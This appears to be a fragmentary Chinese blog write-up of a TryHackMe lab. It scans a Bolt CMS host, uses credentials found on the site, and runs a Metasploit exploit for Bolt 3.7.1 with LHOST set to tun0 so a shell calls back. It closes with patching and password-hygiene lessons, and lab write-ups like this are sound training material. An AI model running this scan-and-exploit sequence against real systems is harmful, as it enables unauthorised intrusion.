今天再來試玩一個 Try Hack Me 上面的簡單題目,攻打一個 CMS (Content Management System ) 的服務。
rustscan -a 10.10.51.13
nmap -A -p22,80,8000 10.10.51.13
Bolt
的頁面bolt
boltadmin123
Bolt 3.7.1
msfconsole
進入 metasploitsearch bolt
use 0
show options
PASSWORD
, USERNAME
, RHOSTS
, LHOST
等必填欄位set PASSWORD password
set USERNAME bolt
set RHOSTS 10.10.51.13
set LHOST tun0
tun0
代表我使用網卡代號 tun0
的 IP (VPN)show options
exploit
ls
這個題目告訴了我們,網頁不一定開在 80 / 443 Port;我們可以透過 CMS 上面的蛛絲馬跡尋找帳號跟密碼的線索;不要耍白ㄘ的把密碼給 Po 到網路上。再來就是可以透過網路上的資源尋找後台、版本等;待蒐集完備後,就可以開始尋找攻擊方式。今天與昨天的內容都提醒了我們,當軟體有重大更新時,一定要馬上的做更新,以避免攻擊。